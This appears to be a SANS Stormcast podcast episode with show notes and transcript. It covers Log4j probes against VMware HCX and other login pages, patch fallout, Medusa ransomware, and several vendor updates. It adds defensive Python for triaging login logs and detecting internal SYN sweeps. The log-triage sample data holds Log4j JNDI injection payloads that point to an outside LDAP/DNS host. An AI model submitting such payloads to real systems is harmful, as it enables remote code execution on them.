
SANS Stormcast Thursday Mar 13th: Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9362.mp3


Log4j Scans for VMware Hybrid Cloud Extensions
An attacker is scanning various login pages, including the authentication feature of the VMware HCX REST API, for Log4j vulnerabilities. The attack submits the exploit string as the username, hoping to trigger the vulnerability when Log4j logs the username.
https://isc.sans.edu/diary/Scans%20for%20VMWare%20Hybrid%20Cloud%20Extension%20%28HCX%29%20API%20(Log4j%20-%20not%20brute%20forcing)/31762
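The diary's point is that these requests look like credential guessing until you inspect the username field. Below is an added triage example (not code from the ISC diary) that parses constructed login-log lines, separates ordinary credential attempts from Log4j lookup payloads per source IP, and records which lookup name (e.g. jndi) was used; the log format and the "/api/sessions" path are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample lines in a generic access-log style; not taken from the ISC diary.
# "/api/sessions" stands in for whatever login endpoint your application logs.
SAMPLE_LOGS = [
    '2025-03-12T10:01:02Z 203.0.113.5 POST /api/sessions user="admin" status=401',
    '2025-03-12T10:01:03Z 203.0.113.5 POST /api/sessions user="${jndi:ldap://198.51.100.7:1389/a}" status=401',
    '2025-03-12T10:01:04Z 203.0.113.5 POST /api/sessions user="${jndi:dns://198.51.100.7/a}" status=401',
    '2025-03-12T10:01:05Z 198.51.100.2 POST /api/sessions user="bob" status=200',
    '2025-03-12T10:01:06Z 198.51.100.2 POST /api/sessions user="bob" status=401',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<path>\S+) '
    r'user="(?P<user>.*)" status=(?P<status>\d+)$'
)
# Outermost Log4j lookup name, e.g. "jndi" in ${jndi:ldap://...}
LOOKUP_RE = re.compile(r'\$\{\s*([A-Za-z0-9_]+)\s*:')


def is_lookup_payload(user: str) -> bool:
    """Legitimate usernames never contain Log4j lookup syntax, so any "${" is a probe."""
    return "${" in user


def triage(lines: List[str]) -> Dict[str, dict]:
    """Per source IP: how many attempts look like credential guessing vs. Log4j probing."""
    out: Dict[str, dict] = defaultdict(
        lambda: {"credential_attempts": 0, "lookup_payloads": 0, "lookups": set()}
    )
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login request in this format
        user, rec = m.group("user"), out[m.group("src")]
        if is_lookup_payload(user):
            rec["lookup_payloads"] += 1
            rec["lookups"].update(LOOKUP_RE.findall(user))
        else:
            rec["credential_attempts"] += 1
    # turn the sets into sorted lists so results are easy to compare and serialize
    return {src: {**r, "lookups": sorted(r["lookups"])} for src, r in out.items()}


if __name__ == "__main__":
    for src, rec in triage(SAMPLE_LOGS).items():
        verdict = "log4j probe" if rec["lookup_payloads"] else "credential attempts"
        print(f"{src}: {verdict} {rec}")
```

Any source with a non-zero lookup_payloads count is probing for Log4Shell rather than guessing passwords, so it belongs on a block list regardless of how many login failures it produced.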

Patch Tuesday Fallout
Yesterday's Apple patch may re-activate Apple Intelligence for users who had earlier disabled it. Microsoft is offering support for users whose USB printers started printing gibberish after a January patch was applied.
https://www.macrumors.com/2025/03/11/ios-18-3-2-apple-intelligence-auto-on/
https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22h2#usb-printers-might-print-random-text-with-the-january-2025-preview-update

Adobe Updates
Adobe updated seven different products, including Adobe Acrobat. The Acrobat vulnerabilities may lead to remote code execution, and Adobe rates them critical.
https://helpx.adobe.com/security/security-bulletin.html

Medusa Ransomware
CISA and partner agencies released details about the Medusa Ransomware. The document includes many details useful to defenders.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

Zoom Update
Zoom released a critical update fixing a number of remote code execution vulnerabilities.
https://www.zoom.com/en/trust/security-bulletin/

FreeType Library Vulnerability
https://www.facebook.com/security/advisories/cve-2025-27363

Podcast Transcript

Hello and welcome to the Thursday, March 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida.

One more vulnerability that's just not going away is Log4j. The latest example are some scans that I observed today against the VMware Hybrid Cloud Extension or HCX API. This is a REST API and at first I thought it was just a brute force attempt I saw because the endpoint that the request was directed at, well, was used for login. It's the session and you just post a username and password to it and you'll get back a session key that's then being used as a bearer token. However, looking at the payload closer, well, the username was actually a Log4j payload. This makes perfect sense, sort of in hindsight, that an attacker would use a username to inject a Log4j payload because, well, that's the part that's usually logged from a request like this. And interestingly, the IP that was going after these VMware systems also went after a couple other login pages like some Cisco login pages and others that I yet have to identify. They're sort of just generic, like some just login. So it could be various applications that are being attacked here.

And then we got a little bit of Patch Tuesday cleanup. First of all, the Apple update released yesterday that fixed the zero-day vulnerability in macOS and iOS. Apparently, after applying this update, some users reported that Apple Intelligence is being reenabled if they had it disabled first. That's Apple's artificial intelligence feature that typically is enabled by default, but you are able to disable it. Well, in Europe, I don't think it's available. So no issue with Europe here. This has been an issue in the last update as well. So nothing really terribly new here. Just be aware. And if you want it disabled, double check that it's still disabled. Nothing yet I heard about yesterday's Microsoft update, but there are some reports that actually the January update does cause some issues with USB printers. And it does cause them to print gibberish. If you're affected by this, I'll have a link to a statement from Microsoft here in the show notes.

And yesterday when I was recording, Adobe had not released its Patch Tuesday update yet. Well, they have been released now. They updated a total of seven different applications. The one that's noteworthy here is Acrobat Reader. Of course, that's an old favorite when it comes to patching. And it fixes a number of critical remote code execution vulnerabilities. So definitely something that you need to apply if you're running Adobe Acrobat Reader.

And CISA, in conjunction with some partner agencies, did publish a report about the Medusa malware. This is a ransomware. I'm always looking first for sort of initial access. In this case, it appears to be phishing. Of course, still very common. ScreenConnect. We talked about this before. And then the Fortinet EMS SQL injection vulnerability. Another sort of interesting TTP here I find is that they see it do some port scans internally. That's something that should sort of pop up in any kind of internal sensor. In particular, some of the odd ports they're scanning, like 3050, the Firebird database port, which isn't used much. So having all of a sudden lots of SYN scans on this port should be something that could trigger an alert. Other than that, a great read as usual. These reports are very useful to, first of all, make sure that you have blocked some of these initial access vectors as much as possible. That you have set up detection for the lateral movement, like these port scans. And then, of course, also just to check if you're not already infected. There are a number of IOCs and such listed in the report.

And then let's look at some other patches. We got, first of all, Zoom released an update, fixing five vulnerabilities. Four of them are rated as high, meaning they lead to remote code execution, buffer overflows, buffer underflow, use after free. Sort of your standard vulnerabilities here. Updated. I find Zoom is pretty good in sort of keeping itself updated. So it shouldn't be a big issue. And then we got an update for the FreeType library. This is one of those font rendering libraries. Plenty of past vulnerabilities in libraries like this. This could lead to remote code execution. Problem with all these libraries is that, number one, they're everywhere. So you'll have to wait for things like browsers and other display software to be updated. Secondly, there are a lot of fonts being loaded sort of dynamically these days. And that's how a vulnerability like this could possibly be exploited.

Well, and this is it again for today. Thanks for subscribing. Thanks for leaving good reviews. Thanks for telling everybody, friends and enemies, how great this podcast is. And get them to subscribe to it as well. Thanks and talk to you again tomorrow. Bye.
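The transcript's suggestion that a burst of SYN probes to an unusual port like 3050 (Firebird) should trigger an internal alert can be turned into a simple flow-based detector. The following is an added example, not code from the CISA advisory or from the podcast: it slides a time window over constructed NetFlow/Zeek-style records and flags a source that SYN-probes many distinct hosts on one port, with a lower threshold for ports that rarely have legitimate clients; the record layout, thresholds and the RARE_PORTS table are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Flow = Tuple[str, str, str, int, str]  # (timestamp, src, dst, dport, tcp_flags)

# Constructed flow records (NetFlow/Zeek conn style), not taken from the CISA advisory.
# One internal host sends SYN-only probes to port 3050 on twelve neighbours within a
# minute; another host has a normal, completed Firebird session (SYN+ACK seen).
FLOWS: List[Flow] = [
    (f"2025-03-12T09:00:{i:02d}", "10.0.5.20", f"10.0.5.{30 + i}", 3050, "S") for i in range(12)
] + [
    ("2025-03-12T09:05:00", "10.0.5.40", "10.0.5.50", 3050, "SA"),
    ("2025-03-12T09:05:01", "10.0.5.40", "10.0.5.50", 3050, "A"),
    ("2025-03-12T09:06:00", "10.0.5.20", "10.0.5.60", 443, "S"),
]

# Ports with few legitimate clients on a typical network; probes here warrant a lower bar.
RARE_PORTS: Dict[int, str] = {3050: "Firebird"}


def detect_syn_sweeps(flows: List[Flow], window: timedelta = timedelta(minutes=5),
                      min_targets: int = 20, rare_min_targets: int = 5) -> List[dict]:
    """Flag a source that SYN-probes many distinct hosts on one port inside `window`."""
    by_key: Dict[Tuple[str, int], List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, dst, dport, flags in flows:
        if flags == "S":  # SYN without ACK: a connection attempt, not an established flow
            by_key[(src, dport)].append((datetime.fromisoformat(ts), dst))
    alerts = []
    for (src, dport), events in by_key.items():
        events.sort()
        threshold = rare_min_targets if dport in RARE_PORTS else min_targets
        best, lo = 0, 0
        # sliding window over time-ordered events, tracking the most distinct targets seen
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            best = max(best, len({d for _, d in events[lo:hi + 1]}))
        if best >= threshold:
            alerts.append({"src": src, "dport": dport,
                           "service": RARE_PORTS.get(dport, "unknown"), "targets": best})
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_sweeps(FLOWS):
        print(f"internal SYN sweep: {alert}")
```

In production the same logic runs over your flow collector's export; the thresholds should be tuned against a baseline of which internal hosts legitimately talk to the port in question.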